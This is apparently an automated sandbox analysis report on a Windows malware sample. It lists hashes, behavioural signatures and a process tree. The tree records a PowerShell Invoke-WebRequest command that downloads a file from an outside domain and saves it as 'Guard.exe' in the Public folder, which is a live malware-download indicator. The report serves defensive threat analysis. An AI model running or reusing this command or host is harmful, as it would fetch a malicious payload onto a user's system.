Analysis
-
max time kernel
96s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 10:18
Static task
static1
Behavioral task
behavioral1
Sample
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe
Resource
win10v2004-20241007-en
General
-
Target
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe
-
Size
1.0MB
-
MD5
4b3b813bb2357edd39d710c708ff1223
-
SHA1
beec5f0c7fe9fe6c3f6e7de7c77ccecc06199e82
-
SHA256
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece
-
SHA512
55f5ff5d974ac0aa9463fa6019e57e7600648d6cc614a28df75b771491c902d64491d5682e559c0fe893e382fe8673dec15da57d46968b172026067ccfb0d1f9
-
SSDEEP
24576:UrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tva14p8:U2EYTb8atv1orq+pEiSDTj1VyvBa17
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 5036 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 5036 powershell.exe 5036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5036 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
Processes:
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exepid process 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exepid process 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exedescription pid process target process PID 440 wrote to memory of 5036 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe powershell.exe PID 440 wrote to memory of 5036 440 510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe"C:\Users\Admin\AppData\Local\Temp\510e2f0999c2d7381fc22ee4c4bf72e0ab1bbe779e01a81095690b1bdc633ece.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://gotexindigos.com/dpunk/dpunk" -OutFile "C:\Users\Public\Guard.exe""2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82